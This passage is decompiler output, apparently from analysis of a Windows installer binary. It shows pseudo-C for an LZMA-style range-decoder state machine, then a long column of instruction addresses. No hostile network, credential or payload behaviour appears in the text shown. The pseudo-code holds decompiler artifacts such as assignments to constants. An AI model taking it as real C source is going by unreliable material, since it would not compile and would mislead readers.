                                                                  							__ecx = _v92;
                                                                  							__eax = _v80 << 4;
                                                                  							__eflags = __eax;
                                                                  							__eax = _v92 + __eax + 4;
                                                                  							goto L133;
                                                                  						case 0x13:
                                                                  							__eflags = _v68;
                                                                  							if(_v68 != 0) {
                                                                  								_t475 =  &_v92;
                                                                  								 *_t475 = _v92 + 0x204;
                                                                  								__eflags =  *_t475;
                                                                  								_v52 = 0x10;
                                                                  								_v68 = 8;
                                                                  								L147:
                                                                  								_v128 = 0x14;
                                                                  								goto L148;
                                                                  							}
                                                                  							__eax = _v80;
                                                                  							__ecx = _v92;
                                                                  							__eax = _v80 << 4;
                                                                  							_v52 = 8;
                                                                  							__eax = _v92 + (_v80 << 4) + 0x104;
                                                                  							L133:
                                                                  							_v92 = __eax;
                                                                  							_v68 = 3;
                                                                  							goto L147;
                                                                  						case 0x14:
                                                                  							_v52 = _v52 + __ebx;
                                                                  							__eax = _v132;
                                                                  							goto L143;
                                                                  						case 0x15:
                                                                  							__eax = 0;
                                                                  							__eflags = _v60 - 7;
                                                                  							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                  							__al = __al & 0x000000fd;
                                                                  							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                  							_v60 = (__eflags >= 0) - 1 + 0xb;
                                                                  							goto L123;
                                                                  						case 0x16:
                                                                  							__eax = _v52;
                                                                  							__eflags = __eax - 4;
                                                                  							if(__eax >= 4) {
                                                                  								_push(3);
                                                                  								_pop(__eax);
                                                                  							}
                                                                  							__ecx = _v8;
                                                                  							_v68 = 6;
                                                                  							__eax = __eax << 7;
                                                                  							_v128 = 0x19;
                                                                  							_v92 = __eax;
                                                                  							goto L148;
                                                                  						case 0x17:
                                                                  							L148:
                                                                  							__eax = _v68;
                                                                  							_v84 = 1;
                                                                  							_v76 = _v68;
                                                                  							goto L152;
                                                                  						case 0x18:
                                                                  							L149:
                                                                  							__eflags = _v112;
                                                                  							if(_v112 == 0) {
                                                                  								_v140 = 0x18;
                                                                  								goto L173;
                                                                  							}
                                                                  							__ecx = _v116;
                                                                  							__eax = _v16;
                                                                  							_v20 = _v20 << 8;
                                                                  							__ecx =  *_v116 & 0x000000ff;
                                                                  							_v112 = _v112 - 1;
                                                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                  							_t490 =  &_v116;
                                                                  							 *_t490 = _v116 + 1;
                                                                  							__eflags =  *_t490;
                                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                  							L151:
                                                                  							_t493 =  &_v76;
                                                                  							 *_t493 = _v76 - 1;
                                                                  							__eflags =  *_t493;
                                                                  							L152:
                                                                  							__eflags = _v76;
                                                                  							if(_v76 <= 0) {
                                                                  								__ecx = _v68;
                                                                  								__ebx = _v84;
                                                                  								0 = 1;
                                                                  								__eax = 1 << __cl;
                                                                  								__ebx = _v84 - (1 << __cl);
                                                                  								__eax = _v128;
                                                                  								_v72 = __ebx;
                                                                  								L143:
                                                                  								_v140 = _t561;
                                                                  								goto L3;
                                                                  							}
                                                                  							__eax = _v84;
                                                                  							_v20 = _v20 >> 0xb;
                                                                  							__edx = _v84 + _v84;
                                                                  							__eax = _v92;
                                                                  							__esi = __edx + __eax;
                                                                  							_v88 = __esi;
                                                                  							__ax =  *__esi;
                                                                  							__edi = __ax & 0x0000ffff;
                                                                  							__ecx = (_v20 >> 0xb) * __edi;
                                                                  							__eflags = _v16 - __ecx;
                                                                  							if(_v16 >= __ecx) {
                                                                  								_v20 = _v20 - __ecx;
                                                                  								_v16 = _v16 - __ecx;
                                                                  								__cx = __ax;
                                                                  								__cx = __ax >> 5;
                                                                  								__eax = __eax - __ecx;
                                                                  								__edx = __edx + 1;
                                                                  								__eflags = __edx;
                                                                  								 *__esi = __ax;
                                                                  								_v84 = __edx;
                                                                  							} else {
                                                                  								_v20 = __ecx;
                                                                  								0x800 = 0x800 - __edi;
                                                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                  								_v84 = _v84 << 1;
                                                                  								 *__esi = __cx;
                                                                  							}
                                                                  							__eflags = _v20 - 0x1000000;
                                                                  							if(_v20 >= 0x1000000) {
                                                                  								goto L151;
                                                                  							} else {
                                                                  								goto L149;
                                                                  							}
                                                                  						case 0x19:
                                                                  							__eflags = __ebx - 4;
                                                                  							if(__ebx < 4) {
                                                                  								_v48 = __ebx;
                                                                  								L122:
                                                                  								_t399 =  &_v48;
                                                                  								 *_t399 = _v48 + 1;
                                                                  								__eflags =  *_t399;
                                                                  								L123:
                                                                  								__eax = _v48;
                                                                  								__eflags = __eax;
                                                                  								if(__eax == 0) {
                                                                  									_v52 = _v52 | 0xffffffff;
                                                                  									goto L173;
                                                                  								}
                                                                  								__eflags = __eax - _v100;
                                                                  								if(__eax > _v100) {
                                                                  									goto L174;
                                                                  								}
                                                                  								_v52 = _v52 + 2;
                                                                  								__eax = _v52;
                                                                  								_t406 =  &_v100;
                                                                  								 *_t406 = _v100 + _v52;
                                                                  								__eflags =  *_t406;
                                                                  								goto L126;
                                                                  							}
                                                                  							__ecx = __ebx;
                                                                  							__eax = __ebx;
                                                                  							__ecx = __ebx >> 1;
                                                                  							__eax = __ebx & 0x00000001;
                                                                  							__ecx = (__ebx >> 1) - 1;
                                                                  							__al = __al | 0x00000002;
                                                                  							__eax = (__ebx & 0x00000001) << __cl;
                                                                  							__eflags = __ebx - 0xe;
                                                                  							_v48 = __eax;
                                                                  							if(__ebx >= 0xe) {
                                                                  								__ebx = 0;
                                                                  								_v76 = __ecx;
                                                                  								L105:
                                                                  								__eflags = _v76;
                                                                  								if(_v76 <= 0) {
                                                                  									__eax = __eax + __ebx;
                                                                  									_v68 = 4;
                                                                  									_v48 = __eax;
                                                                  									__eax = _v8;
                                                                  									__eax = _v8 + 0x644;
                                                                  									__eflags = __eax;
                                                                  									L111:
                                                                  									__ebx = 0;
                                                                  									_v92 = __eax;
                                                                  									_v84 = 1;
                                                                  									_v72 = 0;
                                                                  									_v76 = 0;
                                                                  									L115:
                                                                  									__eax = _v68;
                                                                  									__eflags = _v76 - _v68;
                                                                  									if(_v76 >= _v68) {
                                                                  										_t397 =  &_v48;
                                                                  										 *_t397 = _v48 + __ebx;
                                                                  										__eflags =  *_t397;
                                                                  										goto L122;
                                                                  									}
                                                                  									__eax = _v84;
                                                                  									_v20 = _v20 >> 0xb;
                                                                  									__edi = _v84 + _v84;
                                                                  									__eax = _v92;
                                                                  									__esi = __edi + __eax;
                                                                  									_v88 = __esi;
                                                                  									__ax =  *__esi;
                                                                  									__ecx = __ax & 0x0000ffff;
                                                                  									__edx = (_v20 >> 0xb) * __ecx;
                                                                  									__eflags = _v16 - __edx;
                                                                  									if(_v16 >= __edx) {
                                                                  										__ecx = 0;
                                                                  										_v20 = _v20 - __edx;
                                                                  										__ecx = 1;
                                                                  										_v16 = _v16 - __edx;
                                                                  										__ebx = 1;
                                                                  										__ecx = _v76;
                                                                  										__ebx = 1 << __cl;
                                                                  										__ecx = 1 << __cl;
                                                                  										__ebx = _v72;
                                                                  										__ebx = _v72 | __ecx;
                                                                  										__cx = __ax;
                                                                  										__cx = __ax >> 5;
                                                                  										__eax = __eax - __ecx;
                                                                  										__edi = __edi + 1;
                                                                  										__eflags = __edi;
                                                                  										_v72 = __ebx;
                                                                  										 *__esi = __ax;
                                                                  										_v84 = __edi;
                                                                  									} else {
                                                                  										_v20 = __edx;
                                                                  										0x800 = 0x800 - __ecx;
                                                                  										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                  										_v84 = _v84 << 1;
                                                                  										 *__esi = __dx;
                                                                  									}
                                                                  									__eflags = _v20 - 0x1000000;
                                                                  									if(_v20 >= 0x1000000) {
                                                                  										L114:
                                                                  										_t374 =  &_v76;
                                                                  										 *_t374 = _v76 + 1;
                                                                  										__eflags =  *_t374;
                                                                  										goto L115;
                                                                  									} else {
                                                                  										goto L112;
                                                                  									}
                                                                  								}
                                                                  								__ecx = _v16;
                                                                  								__ebx = __ebx + __ebx;
                                                                  								_v20 = _v20 >> 1;
                                                                  								__eflags = _v16 - _v20;
                                                                  								_v72 = __ebx;
                                                                  								if(_v16 >= _v20) {
                                                                  									__ecx = _v20;
                                                                  									_v16 = _v16 - _v20;
                                                                  									__ebx = __ebx | 0x00000001;
                                                                  									__eflags = __ebx;
                                                                  									_v72 = __ebx;
                                                                  								}
                                                                  								__eflags = _v20 - 0x1000000;
                                                                  								if(_v20 >= 0x1000000) {
                                                                  									L104:
                                                                  									_t344 =  &_v76;
                                                                  									 *_t344 = _v76 - 1;
                                                                  									__eflags =  *_t344;
                                                                  									goto L105;
                                                                  								} else {
                                                                  									goto L102;
                                                                  								}
                                                                  							}
                                                                  							__edx = _v8;
                                                                  							__eax = __eax - __ebx;
                                                                  							_v68 = __ecx;
                                                                  							__eax = _v8 + 0x55e + __eax * 2;
                                                                  							goto L111;
                                                                  						case 0x1a:
                                                                  							L58:
                                                                  							__eflags = _v104;
                                                                  							if(_v104 == 0) {
                                                                  								_v140 = 0x1a;
                                                                  								goto L173;
                                                                  							}
                                                                  							__ecx = _v108;
                                                                  							__al = _v96;
                                                                  							__edx = _v12;
                                                                  							_v100 = _v100 + 1;
                                                                  							_v108 = _v108 + 1;
                                                                  							_v104 = _v104 - 1;
                                                                  							 *_v108 = __al;
                                                                  							__ecx = _v24;
                                                                  							 *(_v12 + __ecx) = __al;
                                                                  							__eax = __ecx + 1;
                                                                  							__edx = 0;
                                                                  							_t197 = __eax % _v120;
                                                                  							__eax = __eax / _v120;
                                                                  							__edx = _t197;
                                                                  							goto L82;
                                                                  						case 0x1b:
                                                                  							L78:
                                                                  							__eflags = _v104;
                                                                  							if(_v104 == 0) {
                                                                  								_v140 = 0x1b;
                                                                  								goto L173;
                                                                  							}
                                                                  							__eax = _v24;
                                                                  							__eax = _v24 - _v48;
                                                                  							__eflags = __eax - _v120;
                                                                  							if(__eax >= _v120) {
                                                                  								__eax = __eax + _v120;
                                                                  								__eflags = __eax;
                                                                  							}
                                                                  							__edx = _v12;
                                                                  							__cl =  *(__edx + __eax);
                                                                  							__eax = _v24;
                                                                  							_v96 = __cl;
                                                                  							 *(__edx + __eax) = __cl;
                                                                  							__eax = __eax + 1;
                                                                  							__edx = 0;
                                                                  							_t280 = __eax % _v120;
                                                                  							__eax = __eax / _v120;
                                                                  							__edx = _t280;
                                                                  							__eax = _v108;
                                                                  							_v100 = _v100 + 1;
                                                                  							_v108 = _v108 + 1;
                                                                  							_t289 =  &_v104;
                                                                  							 *_t289 = _v104 - 1;
                                                                  							__eflags =  *_t289;
                                                                  							 *_v108 = __cl;
                                                                  							L82:
                                                                  							_v24 = __edx;
                                                                  							goto L83;
                                                                  						case 0x1c:
                                                                  							while(1) {
                                                                  								L126:
                                                                  								__eflags = _v104;
                                                                  								if(_v104 == 0) {
                                                                  									break;
                                                                  								}
                                                                  								__eax = _v24;
                                                                  								__eax = _v24 - _v48;
                                                                  								__eflags = __eax - _v120;
                                                                  								if(__eax >= _v120) {
                                                                  									__eax = __eax + _v120;
                                                                  									__eflags = __eax;
                                                                  								}
                                                                  								__edx = _v12;
                                                                  								__cl =  *(__edx + __eax);
                                                                  								__eax = _v24;
                                                                  								_v96 = __cl;
                                                                  								 *(__edx + __eax) = __cl;
                                                                  								__eax = __eax + 1;
                                                                  								__edx = 0;
                                                                  								_t420 = __eax % _v120;
                                                                  								__eax = __eax / _v120;
                                                                  								__edx = _t420;
                                                                  								__eax = _v108;
                                                                  								_v108 = _v108 + 1;
                                                                  								_v104 = _v104 - 1;
                                                                  								_v52 = _v52 - 1;
                                                                  								__eflags = _v52;
                                                                  								 *_v108 = __cl;
                                                                  								_v24 = _t420;
                                                                  								if(_v52 > 0) {
                                                                  									continue;
                                                                  								} else {
                                                                  									L83:
                                                                  									_v140 = 2;
                                                                  									goto L3;
                                                                  								}
                                                                  							}
                                                                  							_v140 = 0x1c;
                                                                  							L173:
                                                                  							_push(0x22);
                                                                  							_pop(_t574);
                                                                  							memcpy(_v148,  &_v140, _t574 << 2);
                                                                  							return 0;
                                                                  					}
                                                                  				}
                                                                  				L174:
                                                                  				_t538 = _t537 | 0xffffffff;
                                                                  				return _t538;
                                                                  			}










































                                                                  0x00406194
                                                                  0x0040619b
                                                                  0x004061a1
                                                                  0x004061a7
                                                                  0x00000000
                                                                  0x004061ab
                                                                  0x004061b7
                                                                  0x004061b7
                                                                  0x004061b7
                                                                  0x004061c0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004061c6
                                                                  0x00000000
                                                                  0x004061cd
                                                                  0x004061d1
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004061da
                                                                  0x004061dd
                                                                  0x004061e0
                                                                  0x004061e2
                                                                  0x004061e4
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004061ea
                                                                  0x004061ed
                                                                  0x004061ef
                                                                  0x004061f0
                                                                  0x004061f3
                                                                  0x004061f5
                                                                  0x004061f6
                                                                  0x004061f8
                                                                  0x004061fb
                                                                  0x00406200
                                                                  0x00406205
                                                                  0x0040620e
                                                                  0x00406221
                                                                  0x00406224
                                                                  0x0040622d
                                                                  0x00406230
                                                                  0x00406258
                                                                  0x00406258
                                                                  0x0040625a
                                                                  0x00406268
                                                                  0x00406268
                                                                  0x0040626c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040625c
                                                                  0x0040625c
                                                                  0x0040625f
                                                                  0x0040625f
                                                                  0x00406260
                                                                  0x00406260
                                                                  0x00000000
                                                                  0x0040625c
                                                                  0x00406232
                                                                  0x00406236
                                                                  0x0040623b
                                                                  0x0040623b
                                                                  0x00406244
                                                                  0x0040624a
                                                                  0x0040624c
                                                                  0x0040624f
                                                                  0x00000000
                                                                  0x00406255
                                                                  0x00406255
                                                                  0x00000000
                                                                  0x00406255
                                                                  0x00000000
                                                                  0x00406272
                                                                  0x00406272
                                                                  0x00406276
                                                                  0x00406b22
                                                                  0x00000000
                                                                  0x00406b22
                                                                  0x0040627f
                                                                  0x0040628f
                                                                  0x00406292
                                                                  0x00406295
                                                                  0x00406295
                                                                  0x00406295
                                                                  0x00406298
                                                                  0x00406298
                                                                  0x0040629c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040629e
                                                                  0x004062a1
                                                                  0x004062a4
                                                                  0x004062ce
                                                                  0x004062d4
                                                                  0x004062db
                                                                  0x00000000
                                                                  0x004062db
                                                                  0x004062a6
                                                                  0x004062aa
                                                                  0x004062ad
                                                                  0x004062b2
                                                                  0x004062b2
                                                                  0x004062bd
                                                                  0x004062c3
                                                                  0x004062c5
                                                                  0x004062c8
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040630d
                                                                  0x00406313
                                                                  0x00406316
                                                                  0x00406323
                                                                  0x0040632b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004062e2
                                                                  0x004062e2
                                                                  0x004062e6
                                                                  0x00406b31
                                                                  0x00000000
                                                                  0x00406b31
                                                                  0x004062f2
                                                                  0x004062fd
                                                                  0x004062fd
                                                                  0x004062fd
                                                                  0x00406300
                                                                  0x00406303
                                                                  0x00406306
                                                                  0x00406309
                                                                  0x0040630b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004069a2
                                                                  0x004069a2
                                                                  0x004069a8
                                                                  0x004069ae
                                                                  0x004069b1
                                                                  0x004069b4
                                                                  0x004069ce
                                                                  0x004069d1
                                                                  0x004069d7
                                                                  0x004069e2
                                                                  0x004069e2
                                                                  0x004069e4
                                                                  0x004069b6
                                                                  0x004069b6
                                                                  0x004069c5
                                                                  0x004069c9
                                                                  0x004069c9
                                                                  0x004069e7
                                                                  0x004069ee
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004069f0
                                                                  0x004069f0
                                                                  0x004069f4
                                                                  0x00406ba3
                                                                  0x00000000
                                                                  0x00406ba3
                                                                  0x00406a00
                                                                  0x00406a07
                                                                  0x00406a0f
                                                                  0x00406a0f
                                                                  0x00406a0f
                                                                  0x00406a12
                                                                  0x00406a15
                                                                  0x00406a15
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406333
                                                                  0x00406335
                                                                  0x00406338
                                                                  0x004063a9
                                                                  0x004063ac
                                                                  0x004063af
                                                                  0x004063b6
                                                                  0x004063c0
                                                                  0x00000000
                                                                  0x004063c0
                                                                  0x0040633a
                                                                  0x0040633e
                                                                  0x00406341
                                                                  0x00406343
                                                                  0x00406346
                                                                  0x00406349
                                                                  0x0040634b
                                                                  0x0040634e
                                                                  0x00406350
                                                                  0x00406355
                                                                  0x00406358
                                                                  0x0040635b
                                                                  0x0040635f
                                                                  0x00406366
                                                                  0x00406369
                                                                  0x00406370
                                                                  0x00406374
                                                                  0x0040637c
                                                                  0x0040637c
                                                                  0x0040637c
                                                                  0x00406376
                                                                  0x00406376
                                                                  0x00406376
                                                                  0x0040636b
                                                                  0x0040636b
                                                                  0x0040636b
                                                                  0x00406380
                                                                  0x00406383
                                                                  0x004063a1
                                                                  0x004063a3
                                                                  0x00000000
                                                                  0x004063a3
                                                                  0x00406385
                                                                  0x00406388
                                                                  0x0040638b
                                                                  0x0040638e
                                                                  0x00406390
                                                                  0x00406390
                                                                  0x00406390
                                                                  0x00406393
                                                                  0x00406396
                                                                  0x00406398
                                                                  0x00406399
                                                                  0x0040639c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004065d2
                                                                  0x004065d6
                                                                  0x004065f4
                                                                  0x004065f7
                                                                  0x004065fe
                                                                  0x00406601
                                                                  0x00406604
                                                                  0x00406607
                                                                  0x0040660a
                                                                  0x0040660d
                                                                  0x0040660f
                                                                  0x00406616
                                                                  0x00406617
                                                                  0x00406619
                                                                  0x0040661c
                                                                  0x0040661f
                                                                  0x00406622
                                                                  0x00406622
                                                                  0x00406627
                                                                  0x00000000
                                                                  0x00406627
                                                                  0x004065d8
                                                                  0x004065db
                                                                  0x004065de
                                                                  0x004065e8
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040663c
                                                                  0x00406640
                                                                  0x00406663
                                                                  0x00406666
                                                                  0x00406669
                                                                  0x00406673
                                                                  0x00406642
                                                                  0x00406642
                                                                  0x00406645
                                                                  0x00406648
                                                                  0x0040664b
                                                                  0x00406658
                                                                  0x0040665b
                                                                  0x0040665b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040667f
                                                                  0x00406683
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406689
                                                                  0x0040668d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406693
                                                                  0x00406695
                                                                  0x00406699
                                                                  0x00406699
                                                                  0x0040669c
                                                                  0x004066a0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004066f0
                                                                  0x004066f4
                                                                  0x004066fb
                                                                  0x004066fe
                                                                  0x00406701
                                                                  0x0040670b
                                                                  0x00000000
                                                                  0x0040670b
                                                                  0x004066f6
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406717
                                                                  0x0040671b
                                                                  0x00406722
                                                                  0x00406725
                                                                  0x00406728
                                                                  0x0040671d
                                                                  0x0040671d
                                                                  0x0040671d
                                                                  0x0040672b
                                                                  0x0040672e
                                                                  0x00406731
                                                                  0x00406731
                                                                  0x00406734
                                                                  0x00406737
                                                                  0x0040673a
                                                                  0x0040673a
                                                                  0x0040673d
                                                                  0x00406744
                                                                  0x00406749
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004067d7
                                                                  0x004067d7
                                                                  0x004067db
                                                                  0x00406b79
                                                                  0x00000000
                                                                  0x00406b79
                                                                  0x004067e1
                                                                  0x004067e4
                                                                  0x004067e7
                                                                  0x004067eb
                                                                  0x004067ee
                                                                  0x004067f4
                                                                  0x004067f6
                                                                  0x004067f6
                                                                  0x004067f6
                                                                  0x004067f9
                                                                  0x004067fc
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004063cc
                                                                  0x004063cc
                                                                  0x004063d0
                                                                  0x00406b3d
                                                                  0x00000000
                                                                  0x00406b3d
                                                                  0x004063d6
                                                                  0x004063d9
                                                                  0x004063dc
                                                                  0x004063e0
                                                                  0x004063e3
                                                                  0x004063e9
                                                                  0x004063eb
                                                                  0x004063eb
                                                                  0x004063eb
                                                                  0x004063ee
                                                                  0x004063f1
                                                                  0x004063f1
                                                                  0x004063f4
                                                                  0x004063f7
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004063fd
                                                                  0x00406403
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406409
                                                                  0x00406409
                                                                  0x0040640d
                                                                  0x00406410
                                                                  0x00406413
                                                                  0x00406416
                                                                  0x00406419
                                                                  0x0040641a
                                                                  0x0040641d
                                                                  0x0040641f
                                                                  0x00406425
                                                                  0x00406428
                                                                  0x0040642b
                                                                  0x0040642e
                                                                  0x00406431
                                                                  0x00406434
                                                                  0x00406437
                                                                  0x00406453
                                                                  0x00406456
                                                                  0x00406459
                                                                  0x0040645c
                                                                  0x00406463
                                                                  0x00406467
                                                                  0x00406469
                                                                  0x0040646d
                                                                  0x00406439
                                                                  0x00406439
                                                                  0x0040643d
                                                                  0x00406445
                                                                  0x0040644a
                                                                  0x0040644c
                                                                  0x0040644e
                                                                  0x0040644e
                                                                  0x00406470
                                                                  0x00406477
                                                                  0x0040647a
                                                                  0x00000000
                                                                  0x00406480
                                                                  0x00000000
                                                                  0x00406480
                                                                  0x00000000
                                                                  0x00406485
                                                                  0x00406485
                                                                  0x00406489
                                                                  0x00406b49
                                                                  0x00000000
                                                                  0x00406b49
                                                                  0x0040648f
                                                                  0x00406492
                                                                  0x00406495
                                                                  0x00406499
                                                                  0x0040649c
                                                                  0x004064a2
                                                                  0x004064a4
                                                                  0x004064a4
                                                                  0x004064a4
                                                                  0x004064a7
                                                                  0x004064aa
                                                                  0x004064aa
                                                                  0x004064aa
                                                                  0x004064b0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004064b2
                                                                  0x004064b5
                                                                  0x004064b8
                                                                  0x004064bb
                                                                  0x004064be
                                                                  0x004064c1
                                                                  0x004064c4
                                                                  0x004064c7
                                                                  0x004064ca
                                                                  0x004064cd
                                                                  0x004064d0
                                                                  0x004064e8
                                                                  0x004064eb
                                                                  0x004064ee
                                                                  0x004064f1
                                                                  0x004064f1
                                                                  0x004064f4
                                                                  0x004064f8
                                                                  0x004064fa
                                                                  0x004064d2
                                                                  0x004064d2
                                                                  0x004064da
                                                                  0x004064df
                                                                  0x004064e1
                                                                  0x004064e3
                                                                  0x004064e3
                                                                  0x004064fd
                                                                  0x00406504
                                                                  0x00406507
                                                                  0x00000000
                                                                  0x00406509
                                                                  0x00000000
                                                                  0x00406509
                                                                  0x00406507
                                                                  0x0040650e
                                                                  0x0040650e
                                                                  0x0040650e
                                                                  0x0040650e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406549
                                                                  0x00406549
                                                                  0x0040654d
                                                                  0x00406b55
                                                                  0x00000000
                                                                  0x00406b55
                                                                  0x00406553
                                                                  0x00406556
                                                                  0x00406559
                                                                  0x0040655d
                                                                  0x00406560
                                                                  0x00406566
                                                                  0x00406568
                                                                  0x00406568
                                                                  0x00406568
                                                                  0x0040656b
                                                                  0x0040656e
                                                                  0x0040656e
                                                                  0x00406574
                                                                  0x00406512
                                                                  0x00406512
                                                                  0x00406515
                                                                  0x00000000
                                                                  0x00406515
                                                                  0x00406576
                                                                  0x00406576
                                                                  0x00406579
                                                                  0x0040657c
                                                                  0x0040657f
                                                                  0x00406582
                                                                  0x00406585
                                                                  0x00406588
                                                                  0x0040658b
                                                                  0x0040658e
                                                                  0x00406591
                                                                  0x00406594
                                                                  0x004065ac
                                                                  0x004065af
                                                                  0x004065b2
                                                                  0x004065b5
                                                                  0x004065b5
                                                                  0x004065b8
                                                                  0x004065bc
                                                                  0x004065be
                                                                  0x00406596
                                                                  0x00406596
                                                                  0x0040659e
                                                                  0x004065a3
                                                                  0x004065a5
                                                                  0x004065a7
                                                                  0x004065a7
                                                                  0x004065c1
                                                                  0x004065c8
                                                                  0x004065cb
                                                                  0x00000000
                                                                  0x004065cd
                                                                  0x00000000
                                                                  0x004065cd
                                                                  0x00000000
                                                                  0x0040685a
                                                                  0x0040685a
                                                                  0x0040685e
                                                                  0x00406b85
                                                                  0x00000000
                                                                  0x00406b85
                                                                  0x00406864
                                                                  0x00406867
                                                                  0x0040686a
                                                                  0x0040686e
                                                                  0x00406871
                                                                  0x00406877
                                                                  0x00406879
                                                                  0x00406879
                                                                  0x00406879
                                                                  0x0040687c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040662a
                                                                  0x0040662a
                                                                  0x0040662d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406969
                                                                  0x0040696d
                                                                  0x0040698f
                                                                  0x00406992
                                                                  0x0040699c
                                                                  0x0040699f
                                                                  0x0040699f
                                                                  0x00000000
                                                                  0x0040699f
                                                                  0x0040696f
                                                                  0x00406972
                                                                  0x00406976
                                                                  0x00406979
                                                                  0x00406979
                                                                  0x0040697c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406a26
                                                                  0x00406a2a
                                                                  0x00406a48
                                                                  0x00406a48
                                                                  0x00406a48
                                                                  0x00406a4f
                                                                  0x00406a56
                                                                  0x00406a5d
                                                                  0x00406a5d
                                                                  0x00000000
                                                                  0x00406a5d
                                                                  0x00406a2c
                                                                  0x00406a2f
                                                                  0x00406a32
                                                                  0x00406a35
                                                                  0x00406a3c
                                                                  0x00406980
                                                                  0x00406980
                                                                  0x00406983
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406b17
                                                                  0x00406b1a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406751
                                                                  0x00406753
                                                                  0x0040675a
                                                                  0x0040675b
                                                                  0x0040675d
                                                                  0x00406760
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406768
                                                                  0x0040676b
                                                                  0x0040676e
                                                                  0x00406770
                                                                  0x00406772
                                                                  0x00406772
                                                                  0x00406773
                                                                  0x00406776
                                                                  0x0040677d
                                                                  0x00406780
                                                                  0x0040678e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406a64
                                                                  0x00406a64
                                                                  0x00406a67
                                                                  0x00406a6e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406a73
                                                                  0x00406a73
                                                                  0x00406a77
                                                                  0x00406baf
                                                                  0x00000000
                                                                  0x00406baf
                                                                  0x00406a7d
                                                                  0x00406a80
                                                                  0x00406a83
                                                                  0x00406a87
                                                                  0x00406a8a
                                                                  0x00406a90
                                                                  0x00406a92
                                                                  0x00406a92
                                                                  0x00406a92
                                                                  0x00406a95
                                                                  0x00406a98
                                                                  0x00406a98
                                                                  0x00406a98
                                                                  0x00406a98
                                                                  0x00406a9b
                                                                  0x00406a9b
                                                                  0x00406a9f
                                                                  0x00406aff
                                                                  0x00406b02
                                                                  0x00406b07
                                                                  0x00406b08
                                                                  0x00406b0a
                                                                  0x00406b0c
                                                                  0x00406b0f
                                                                  0x00406a1b
                                                                  0x00406a1b
                                                                  0x00000000
                                                                  0x00406a1b
                                                                  0x00406aa1
                                                                  0x00406aa7
                                                                  0x00406aaa
                                                                  0x00406aad
                                                                  0x00406ab0
                                                                  0x00406ab3
                                                                  0x00406ab6
                                                                  0x00406ab9
                                                                  0x00406abc
                                                                  0x00406abf
                                                                  0x00406ac2
                                                                  0x00406adb
                                                                  0x00406ade
                                                                  0x00406ae1
                                                                  0x00406ae4
                                                                  0x00406ae8
                                                                  0x00406aea
                                                                  0x00406aea
                                                                  0x00406aeb
                                                                  0x00406aee
                                                                  0x00406ac4
                                                                  0x00406ac4
                                                                  0x00406acc
                                                                  0x00406ad1
                                                                  0x00406ad3
                                                                  0x00406ad6
                                                                  0x00406ad6
                                                                  0x00406af1
                                                                  0x00406af8
                                                                  0x00000000
                                                                  0x00406afa
                                                                  0x00000000
                                                                  0x00406afa
                                                                  0x00000000
                                                                  0x00406796
                                                                  0x00406799
                                                                  0x004067cf
                                                                  0x004068ff
                                                                  0x004068ff
                                                                  0x004068ff
                                                                  0x004068ff
                                                                  0x00406902
                                                                  0x00406902
                                                                  0x00406905
                                                                  0x00406907
                                                                  0x00406b91
                                                                  0x00000000
                                                                  0x00406b91
                                                                  0x0040690d
                                                                  0x00406910
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406916
                                                                  0x0040691a
                                                                  0x0040691d
                                                                  0x0040691d
                                                                  0x0040691d
                                                                  0x00000000
                                                                  0x0040691d
                                                                  0x0040679b
                                                                  0x0040679d
                                                                  0x0040679f
                                                                  0x004067a1
                                                                  0x004067a4
                                                                  0x004067a5
                                                                  0x004067a7
                                                                  0x004067a9
                                                                  0x004067ac
                                                                  0x004067af
                                                                  0x004067c5
                                                                  0x004067ca
                                                                  0x00406802
                                                                  0x00406802
                                                                  0x00406806
                                                                  0x00406832
                                                                  0x00406834
                                                                  0x0040683b
                                                                  0x0040683e
                                                                  0x00406841
                                                                  0x00406841
                                                                  0x00406846
                                                                  0x00406846
                                                                  0x00406848
                                                                  0x0040684b
                                                                  0x00406852
                                                                  0x00406855
                                                                  0x00406882
                                                                  0x00406882
                                                                  0x00406885
                                                                  0x00406888
                                                                  0x004068fc
                                                                  0x004068fc
                                                                  0x004068fc
                                                                  0x00000000
                                                                  0x004068fc
                                                                  0x0040688a
                                                                  0x00406890
                                                                  0x00406893
                                                                  0x00406896
                                                                  0x00406899
